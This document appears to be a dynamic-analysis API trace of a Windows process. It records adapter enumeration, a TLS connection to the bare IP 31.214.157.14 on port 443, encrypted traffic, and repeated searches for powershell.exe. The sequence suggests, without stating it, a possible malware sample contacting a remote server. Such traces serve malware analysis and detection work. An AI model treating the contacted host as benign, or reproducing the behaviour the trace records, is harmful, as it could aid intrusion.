	[0120.339] WSAEventSelect (s=0x4e4, hEventObject=0x4e8, lNetworkEvents=512) returned 0
	[0120.456] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0x0, SizePointer=0x1c70d048*=0x0 | out: AdapterAddresses=0x0, SizePointer=0x1c70d048*=0xbf0) returned 0x6f
	[0120.470] LocalAlloc (uFlags=0x0, uBytes=0xbf0) returned 0x1b8b4c60
	[0120.470] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0x1b8b4c60, SizePointer=0x1c70d048*=0xbf0 | out: AdapterAddresses=0x1b8b4c60*(Alignment=0xe000001c0, Length=0x1c0, IfIndex=0xe, Next=0x1b8b4f90, AdapterName="{208C2C2F-ECA0-4B34-8C2D-83B1FBC25E0D}", FirstUnicastAddress=0x1b8b4ee0, FirstAnycastAddress=0x0, FirstMulticastAddress=0x0, FirstDnsServerAddress=0x0, DnsSuffix="", Description="Intel(R) PRO/1000 MT Network Connection #2", FriendlyName="Local Area Connection 2", PhysicalAddress=([0]=0x0, [1]=0x1c, [2]=0x34, [3]=0xa2, [4]=0x42, [5]=0x2b, [6]=0x0, [7]=0x0), PhysicalAddressLength=0x6, Flags=0x3e5, DdnsEnabled=0x3e5, RegisterAdapterSuffix=0x3e5, Dhcpv4Enabled=0x3e5, ReceiveOnly=0x3e5, NoMulticast=0x3e5, Ipv6OtherStatefulConfig=0x3e5, NetbiosOverTcpipEnabled=0x3e5, Ipv4Enabled=0x3e5, Ipv6Enabled=0x3e5, Ipv6ManagedAddressConfigurationSupported=0x3e5, Mtu=0x5dc, IfType=0x6, OperStatus=0x1, Ipv6IfIndex=0xe, ZoneIndices=([0]=0xe, [1]=0xe, [2]=0xe, [3]=0xe, [4]=0x1, [5]=0x1, [6]=0x1, [7]=0x1, [8]=0x1, [9]=0x1, [10]=0x1, [11]=0x1, [12]=0x1, [13]=0x1, [14]=0x0, [15]=0x1), FirstPrefix=0x0, TransmitLinkSpeed=0x3b9aca00, ReceiveLinkSpeed=0x3b9aca00, FirstWinsServerAddress=0x0, FirstGatewayAddress=0x0, Ipv4Metric=0xa, Ipv6Metric=0xa, Luid=0x6000007000000, Dhcpv4Server.lpSockaddr=0x1b8b4e20*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.1"), Dhcpv4Server.iSockaddrLength=16, CompartmentId=0x1, NetworkGuid=0x11de7039846ee341, ConnectionType=0x1, TunnelType=0x0, Dhcpv6Server.lpSockaddr=0x0, Dhcpv6Server.iSockaddrLength=0, Dhcpv6ClientDuid=([0]=0x0, [1]=0x1, [2]=0x0, [3]=0x1, [4]=0x20, [5]=0xc7, [6]=0x5c, [7]=0xa7, [8]=0xc4, [9]=0x3d, [10]=0xc7, [11]=0x58, [12]=0x4a, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0), Dhcpv6ClientDuidLength=0xe, Dhcpv6Iaid=0x11c43dc7, FirstDnsSuffix=0x0), SizePointer=0x1c70d048*=0xbf0) returned 0x0
	[0120.489] LocalFree (hMem=0x1b8b4c60) returned 0x0
	[0120.492] WSAConnect (in: s=0x4cc, name=0x304e038*(sa_family=2, sin_port=0x1bb, sin_addr="31.214.157.14"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0120.535] closesocket (s=0x4c8) returned 0
	[0121.224] EnumerateSecurityPackagesW (in: pcPackages=0x1c70d3d8, ppPackageInfo=0x1c70d3d0 | out: pcPackages=0x1c70d3d8, ppPackageInfo=0x1c70d3d0) returned 0x0
	[0121.244] lstrlenW (lpString="Negotiate") returned 9
	[0121.245] CoTaskMemAlloc (cb=0x16) returned 0x1b8a65f0
	[0121.245] RtlMoveMemory (in: Destination=0x1b8a65f0, Source=0x26deb0, Length=0x14 | out: Destination=0x1b8a65f0) 
	[0121.245] CoTaskMemFree (pv=0x1b8a65f0) 
	[0121.245] lstrlenW (lpString="Microsoft Package Negotiator") returned 28
	[0121.245] CoTaskMemAlloc (cb=0x3c) returned 0x1b89f3a0
	[0121.245] RtlMoveMemory (in: Destination=0x1b89f3a0, Source=0x26dec4, Length=0x3a | out: Destination=0x1b89f3a0) 
	[0121.245] CoTaskMemFree (pv=0x1b89f3a0) 
	[0121.245] lstrlenW (lpString="NegoExtender") returned 12
	[0121.245] CoTaskMemAlloc (cb=0x1c) returned 0x1b8b1280
	[0121.245] RtlMoveMemory (in: Destination=0x1b8b1280, Source=0x26defe, Length=0x1a | out: Destination=0x1b8b1280) 
	[0121.245] CoTaskMemFree (pv=0x1b8b1280) 
	[0121.245] lstrlenW (lpString="NegoExtender Security Package") returned 29
	[0121.245] CoTaskMemAlloc (cb=0x3e) returned 0x1b89f3a0
	[0121.245] RtlMoveMemory (in: Destination=0x1b89f3a0, Source=0x26df18, Length=0x3c | out: Destination=0x1b89f3a0) 
	[0121.245] CoTaskMemFree (pv=0x1b89f3a0) 
	[0121.246] lstrlenW (lpString="Kerberos") returned 8
	[0121.246] CoTaskMemAlloc (cb=0x14) returned 0x1b8a65f0
	[0121.246] RtlMoveMemory (in: Destination=0x1b8a65f0, Source=0x26df54, Length=0x12 | out: Destination=0x1b8a65f0) 
	[0121.246] CoTaskMemFree (pv=0x1b8a65f0) 
	[0121.246] lstrlenW (lpString="Microsoft Kerberos V1.0") returned 23
	[0121.246] CoTaskMemAlloc (cb=0x32) returned 0x1b898820
	[0121.246] RtlMoveMemory (in: Destination=0x1b898820, Source=0x26df66, Length=0x30 | out: Destination=0x1b898820) 
	[0121.246] CoTaskMemFree (pv=0x1b898820) 
	[0121.246] lstrlenW (lpString="NTLM") returned 4
	[0121.246] CoTaskMemAlloc (cb=0xc) returned 0x1b8a65f0
	[0121.246] RtlMoveMemory (in: Destination=0x1b8a65f0, Source=0x26df96, Length=0xa | out: Destination=0x1b8a65f0) 
	[0121.246] CoTaskMemFree (pv=0x1b8a65f0) 
	[0121.246] lstrlenW (lpString="NTLM Security Package") returned 21
	[0121.246] CoTaskMemAlloc (cb=0x2e) returned 0x1b898820
	[0121.246] RtlMoveMemory (in: Destination=0x1b898820, Source=0x26dfa0, Length=0x2c | out: Destination=0x1b898820) 
	[0121.246] CoTaskMemFree (pv=0x1b898820) 
	[0121.246] lstrlenW (lpString="Schannel") returned 8
	[0121.246] CoTaskMemAlloc (cb=0x14) returned 0x1b8a65f0
	[0121.246] RtlMoveMemory (in: Destination=0x1b8a65f0, Source=0x26dfcc, Length=0x12 | out: Destination=0x1b8a65f0) 
	[0121.246] CoTaskMemFree (pv=0x1b8a65f0) 
	[0121.246] lstrlenW (lpString="Schannel Security Package") returned 25
	[0121.246] CoTaskMemAlloc (cb=0x36) returned 0x1b898820
	[0121.246] RtlMoveMemory (in: Destination=0x1b898820, Source=0x26dfde, Length=0x34 | out: Destination=0x1b898820) 
	[0121.246] CoTaskMemFree (pv=0x1b898820) 
	[0121.246] lstrlenW (lpString="Microsoft Unified Security Protocol Provider") returned 44
	[0121.246] CoTaskMemAlloc (cb=0x5c) returned 0x1b889560
	[0121.246] RtlMoveMemory (in: Destination=0x1b889560, Source=0x26e012, Length=0x5a | out: Destination=0x1b889560) 
	[0121.246] CoTaskMemFree (pv=0x1b889560) 
	[0121.246] lstrlenW (lpString="Schannel Security Package") returned 25
	[0121.246] CoTaskMemAlloc (cb=0x36) returned 0x1b898820
	[0121.246] RtlMoveMemory (in: Destination=0x1b898820, Source=0x26e06c, Length=0x34 | out: Destination=0x1b898820) 
	[0121.247] CoTaskMemFree (pv=0x1b898820) 
	[0121.247] lstrlenW (lpString="WDigest") returned 7
	[0121.247] CoTaskMemAlloc (cb=0x12) returned 0x1b8a65f0
	[0121.247] RtlMoveMemory (in: Destination=0x1b8a65f0, Source=0x26e0a0, Length=0x10 | out: Destination=0x1b8a65f0) 
	[0121.247] CoTaskMemFree (pv=0x1b8a65f0) 
	[0121.247] lstrlenW (lpString="Digest Authentication for Windows") returned 33
	[0121.247] CoTaskMemAlloc (cb=0x46) returned 0x1b89f3a0
	[0121.247] RtlMoveMemory (in: Destination=0x1b89f3a0, Source=0x26e0b0, Length=0x44 | out: Destination=0x1b89f3a0) 
	[0121.247] CoTaskMemFree (pv=0x1b89f3a0) 
	[0121.247] lstrlenW (lpString="TSSSP") returned 5
	[0121.247] CoTaskMemAlloc (cb=0xe) returned 0x1b8a65f0
	[0121.247] RtlMoveMemory (in: Destination=0x1b8a65f0, Source=0x26e0f4, Length=0xc | out: Destination=0x1b8a65f0) 
	[0121.247] CoTaskMemFree (pv=0x1b8a65f0) 
	[0121.247] lstrlenW (lpString="TS Service Security Package") returned 27
	[0121.247] CoTaskMemAlloc (cb=0x3a) returned 0x1b89f3a0
	[0121.247] RtlMoveMemory (in: Destination=0x1b89f3a0, Source=0x26e100, Length=0x38 | out: Destination=0x1b89f3a0) 
	[0121.247] CoTaskMemFree (pv=0x1b89f3a0) 
	[0121.247] lstrlenW (lpString="pku2u") returned 5
	[0121.247] CoTaskMemAlloc (cb=0xe) returned 0x1b8a65f0
	[0121.247] RtlMoveMemory (in: Destination=0x1b8a65f0, Source=0x26e138, Length=0xc | out: Destination=0x1b8a65f0) 
	[0121.247] CoTaskMemFree (pv=0x1b8a65f0) 
	[0121.247] lstrlenW (lpString="PKU2U Security Package") returned 22
	[0121.247] CoTaskMemAlloc (cb=0x30) returned 0x1b898820
	[0121.247] RtlMoveMemory (in: Destination=0x1b898820, Source=0x26e144, Length=0x2e | out: Destination=0x1b898820) 
	[0121.247] CoTaskMemFree (pv=0x1b898820) 
	[0121.247] lstrlenW (lpString="CREDSSP") returned 7
	[0121.247] CoTaskMemAlloc (cb=0x12) returned 0x1b8a65f0
	[0121.247] RtlMoveMemory (in: Destination=0x1b8a65f0, Source=0x26e172, Length=0x10 | out: Destination=0x1b8a65f0) 
	[0121.247] CoTaskMemFree (pv=0x1b8a65f0) 
	[0121.247] lstrlenW (lpString="Microsoft CredSSP Security Provider") returned 35
	[0121.248] CoTaskMemAlloc (cb=0x4a) returned 0x1b8afaf0
	[0121.248] RtlMoveMemory (in: Destination=0x1b8afaf0, Source=0x26e182, Length=0x48 | out: Destination=0x1b8afaf0) 
	[0121.248] CoTaskMemFree (pv=0x1b8afaf0) 
	[0121.248] FreeContextBuffer (in: pvContextBuffer=0x26dd70 | out: pvContextBuffer=0x26dd70) returned 0x0
	[0121.249] GetCurrentProcess () returned 0xffffffffffffffff
	[0121.249] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c70ceb8 | out: TokenHandle=0x1c70ceb8*=0x4c8) returned 1
	[0121.253] AcquireCredentialsHandleW (in: pPrincipal=0x0, pPackage=0x3052218, fCredentialUse=0x2, pvLogonId=0x0, pAuthData=0x1c70cdc8, pGetKeyFn=0x0, pvGetKeyArgument=0x0, phCredential=0x1c70cdb8, ptsExpiry=0x1c70cdb0 | out: phCredential=0x1c70cdb8, ptsExpiry=0x1c70cdb0) returned 0x0
	[0121.259] InitializeSecurityContextW (in: phCredential=0x1c70cfc0, phContext=0x0, pTargetName=0x30295d8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x1c70cfb0, pOutput=0x3054960, pfContextAttr=0x1c70cfa8, ptsExpiry=0x1c70cfa0 | out: phNewContext=0x1c70cfb0, pOutput=0x3054960, pfContextAttr=0x1c70cfa8, ptsExpiry=0x1c70cfa0) returned 0x90312
	[0121.259] FreeContextBuffer (in: pvContextBuffer=0x1b88f070 | out: pvContextBuffer=0x1b88f070) returned 0x0
	[0121.316] send (s=0x4cc, buf=0x3054a30*, len=115, flags=0) returned 115
	[0121.317] recv (in: s=0x4cc, buf=0x3054a30, len=5, flags=0 | out: buf=0x3054a30*) returned 5
	[0121.344] recv (in: s=0x4cc, buf=0x3054a35, len=93, flags=0 | out: buf=0x3054a35*) returned 93
	[0121.345] InitializeSecurityContextW (in: phCredential=0x1c70cee0, phContext=0x1c70d190, pTargetName=0x30295d8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x3054d40, Reserved2=0x0, phNewContext=0x1c70ced0, pOutput=0x3054d60, pfContextAttr=0x1c70cec8, ptsExpiry=0x1c70cec0 | out: phNewContext=0x1c70ced0, pOutput=0x3054d60, pfContextAttr=0x1c70cec8, ptsExpiry=0x1c70cec0) returned 0x90312
	[0121.346] recv (in: s=0x4cc, buf=0x3054e50, len=5, flags=0 | out: buf=0x3054e50*) returned 5
	[0121.346] recv (in: s=0x4cc, buf=0x3054e75, len=2549, flags=0 | out: buf=0x3054e75*) returned 2549
	[0121.346] InitializeSecurityContextW (in: phCredential=0x1c70ce10, phContext=0x1c70d0c0, pTargetName=0x30295d8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x3055940, Reserved2=0x0, phNewContext=0x1c70ce00, pOutput=0x3055960, pfContextAttr=0x1c70cdf8, ptsExpiry=0x1c70cdf0 | out: phNewContext=0x1c70ce00, pOutput=0x3055960, pfContextAttr=0x1c70cdf8, ptsExpiry=0x1c70cdf0) returned 0x90312
	[0121.347] recv (in: s=0x4cc, buf=0x3055a50, len=5, flags=0 | out: buf=0x3055a50*) returned 5
	[0121.347] recv (in: s=0x4cc, buf=0x3055a75, len=331, flags=0 | out: buf=0x3055a75*) returned 263
	[0121.347] recv (in: s=0x4cc, buf=0x3055b7c, len=68, flags=0 | out: buf=0x3055b7c*) returned 68
	[0121.359] InitializeSecurityContextW (in: phCredential=0x1c70cd40, phContext=0x1c70cff0, pTargetName=0x30295d8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x3055c90, Reserved2=0x0, phNewContext=0x1c70cd30, pOutput=0x3055cb0, pfContextAttr=0x1c70cd28, ptsExpiry=0x1c70cd20 | out: phNewContext=0x1c70cd30, pOutput=0x3055cb0, pfContextAttr=0x1c70cd28, ptsExpiry=0x1c70cd20) returned 0x90312
	[0121.361] recv (in: s=0x4cc, buf=0x3055da0, len=5, flags=0 | out: buf=0x3055da0*) returned 5
	[0121.361] recv (in: s=0x4cc, buf=0x3055dc5, len=4, flags=0 | out: buf=0x3055dc5*) returned 4
	[0121.361] InitializeSecurityContextW (in: phCredential=0x1c70cc70, phContext=0x1c70cf20, pTargetName=0x30295d8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x3055ea0, Reserved2=0x0, phNewContext=0x1c70cc60, pOutput=0x3055ec0, pfContextAttr=0x1c70cc58, ptsExpiry=0x1c70cc50 | out: phNewContext=0x1c70cc60, pOutput=0x3055ec0, pfContextAttr=0x1c70cc58, ptsExpiry=0x1c70cc50) returned 0x90312
	[0121.370] FreeContextBuffer (in: pvContextBuffer=0x1b88c030 | out: pvContextBuffer=0x1b88c030) returned 0x0
	[0121.370] send (s=0x4cc, buf=0x3055f90*, len=134, flags=0) returned 134
	[0121.371] recv (in: s=0x4cc, buf=0x3055f90, len=5, flags=0 | out: buf=0x3055f90*) returned 5
	[0121.399] recv (in: s=0x4cc, buf=0x3055f95, len=1, flags=0 | out: buf=0x3055f95*) returned 1
	[0121.399] InitializeSecurityContextW (in: phCredential=0x1c70cba0, phContext=0x1c70ce50, pTargetName=0x30295d8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x3056108, Reserved2=0x0, phNewContext=0x1c70cb90, pOutput=0x3056128, pfContextAttr=0x1c70cb88, ptsExpiry=0x1c70cb80 | out: phNewContext=0x1c70cb90, pOutput=0x3056128, pfContextAttr=0x1c70cb88, ptsExpiry=0x1c70cb80) returned 0x90312
	[0121.399] recv (in: s=0x4cc, buf=0x3056218, len=5, flags=0 | out: buf=0x3056218*) returned 5
	[0121.400] recv (in: s=0x4cc, buf=0x305623d, len=48, flags=0 | out: buf=0x305623d*) returned 48
	[0121.400] InitializeSecurityContextW (in: phCredential=0x1c70cad0, phContext=0x1c70cd80, pTargetName=0x30295d8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x3056340, Reserved2=0x0, phNewContext=0x1c70cac0, pOutput=0x3056360, pfContextAttr=0x1c70cab8, ptsExpiry=0x1c70cab0 | out: phNewContext=0x1c70cac0, pOutput=0x3056360, pfContextAttr=0x1c70cab8, ptsExpiry=0x1c70cab0) returned 0x0
	[0121.413] QueryContextAttributesW (in: phContext=0x1c70cd30, ulAttribute=0x4, pBuffer=0x3056478 | out: pBuffer=0x3056478) returned 0x0
	[0121.413] QueryContextAttributesW (in: phContext=0x1c70cd30, ulAttribute=0x5a, pBuffer=0x30564f8 | out: pBuffer=0x30564f8) returned 0x0
	[0121.422] QueryContextAttributesW (in: phContext=0x1c70cbe0, ulAttribute=0x53, pBuffer=0x3056848 | out: pBuffer=0x3056848) returned 0x0
	[0121.432] CertDuplicateCRLContext (pCrlContext=0x1b887000) returned 0x1b887000
	[0121.436] CertDuplicateStore (hCertStore=0x2896f0) returned 0x2896f0
	[0121.437] CertEnumCertificatesInStore (hCertStore=0x2896f0, pPrevCertContext=0x0) returned 0x1b887080
	[0121.437] CertDuplicateCRLContext (pCrlContext=0x1b887080) returned 0x1b887080
	[0121.438] CertEnumCertificatesInStore (hCertStore=0x2896f0, pPrevCertContext=0x1b887080) returned 0x1b887000
	[0121.438] CertDuplicateCRLContext (pCrlContext=0x1b887000) returned 0x1b887000
	[0121.438] CertEnumCertificatesInStore (hCertStore=0x2896f0, pPrevCertContext=0x1b887000) returned 0x0
	[0121.438] CertCloseStore (hCertStore=0x2896f0, dwFlags=0x0) returned 1
	[0121.438] CertFreeCRLContext (pCrlContext=0x1b887000) returned 1
	[0121.485] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x289620
	[0121.486] CertAddCRLLinkToStore (in: hCertStore=0x289620, pCrlContext=0x1b887080, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0121.541] CertAddCRLLinkToStore (in: hCertStore=0x289620, pCrlContext=0x1b887000, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0121.546] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x1b887000, pTime=0x1c70cbe8, hAdditionalStore=0x289620, pChainPara=0x1c70cbf0, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x1c70cbe0 | out: ppChainContext=0x1c70cbe0) returned 1
	[0122.249] CertDuplicateCertificateChain (pChainContext=0x1ce90c20) returned 0x1ce90c20
	[0122.251] CertDuplicateCRLContext (pCrlContext=0x1b887000) returned 0x1b887000
	[0122.251] CertDuplicateCRLContext (pCrlContext=0x1cee9b80) returned 0x1cee9b80
	[0122.251] CertDuplicateCRLContext (pCrlContext=0x1cee9c00) returned 0x1cee9c00
	[0122.251] CertFreeCertificateChain (pChainContext=0x1ce90c20) 
	[0122.252] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x1ce90c20, pPolicyPara=0x1c70cd68, pPolicyStatus=0x1c70cd48 | out: pPolicyStatus=0x1c70cd48) returned 1
	[0122.253] SetLastError (dwErrCode=0x0) 
	[0122.355] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x1ce90c20, pPolicyPara=0x1c70ce40, pPolicyStatus=0x1c70ce28 | out: pPolicyStatus=0x1c70ce28) returned 1
	[0122.419] CertFreeCertificateChain (pChainContext=0x1ce90c20) 
	[0122.419] CertFreeCRLContext (pCrlContext=0x1b887000) returned 1
	[0122.554] EncryptMessage (in: phContext=0x1c70d3f0, fQOP=0x0, pMessage=0x3058f70, MessageSeqNo=0x0 | out: pMessage=0x3058f70) returned 0x0
	[0122.554] send (s=0x4cc, buf=0x3058ca8*, len=117, flags=0) returned 117
	[0122.566] setsockopt (s=0x4cc, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0122.566] recv (in: s=0x4cc, buf=0x30590d0, len=5, flags=0 | out: buf=0x30590d0*) returned 5
	[0122.597] recv (in: s=0x4cc, buf=0x30590f5, len=2112, flags=0 | out: buf=0x30590f5*) returned 1455
	[0122.597] recv (in: s=0x4cc, buf=0x30596a4, len=657, flags=0 | out: buf=0x30596a4*) returned 657
	[0122.610] DecryptMessage (in: phContext=0x1c70cfb0, pMessage=0x3059a48, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3059a48, pfQOP=0x0) returned 0x0
	[0122.637] setsockopt (s=0x4cc, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0122.640] SetEvent (hEvent=0x378) returned 1
	[0122.717] VirtualQuery (in: lpAddress=0x1c70d150, lpBuffer=0x1c70e010, dwLength=0x30 | out: lpBuffer=0x1c70e010*(BaseAddress=0x1c70d000, AllocationBase=0x1bd80000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0122.720] CoTaskMemAlloc (cb=0x104) returned 0x309710
	[0122.720] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x309710, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0122.720] CoTaskMemFree (pv=0x309710) 
	[0122.722] CoTaskMemAlloc (cb=0x104) returned 0x309710
	[0122.722] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x309710, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0122.722] CoTaskMemFree (pv=0x309710) 
	[0122.722] CoTaskMemAlloc (cb=0x128) returned 0x1b952c50
	[0122.722] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1b952c50, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0122.722] CoTaskMemFree (pv=0x1b952c50) 
	[0122.724] CoTaskMemAlloc (cb=0x20e) returned 0x1b874d20
	[0122.724] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b874d20 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0122.724] CoTaskMemFree (pv=0x1b874d20) 
	[0122.726] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0122.727] SetErrorMode (uMode=0x1) returned 0x1
	[0122.729] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.831] SetErrorMode (uMode=0x1) returned 0x1
	[0122.832] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0122.833] SetErrorMode (uMode=0x1) returned 0x1
	[0122.833] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.ps1", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.841] SetErrorMode (uMode=0x1) returned 0x1
	[0122.842] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0122.842] SetErrorMode (uMode=0x1) returned 0x1
	[0122.842] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.psm1", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.848] SetErrorMode (uMode=0x1) returned 0x1
	[0122.848] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0122.849] SetErrorMode (uMode=0x1) returned 0x1
	[0122.849] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.psd1", lpFindFileData=0x1c70d3f0 | out: lpFindFileData=0x1c70d3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.850] SetErrorMode (uMode=0x1) returned 0x1
	[0122.850] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c70d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0122.851] SetErrorMode (uMode=0x1) returned 0x1
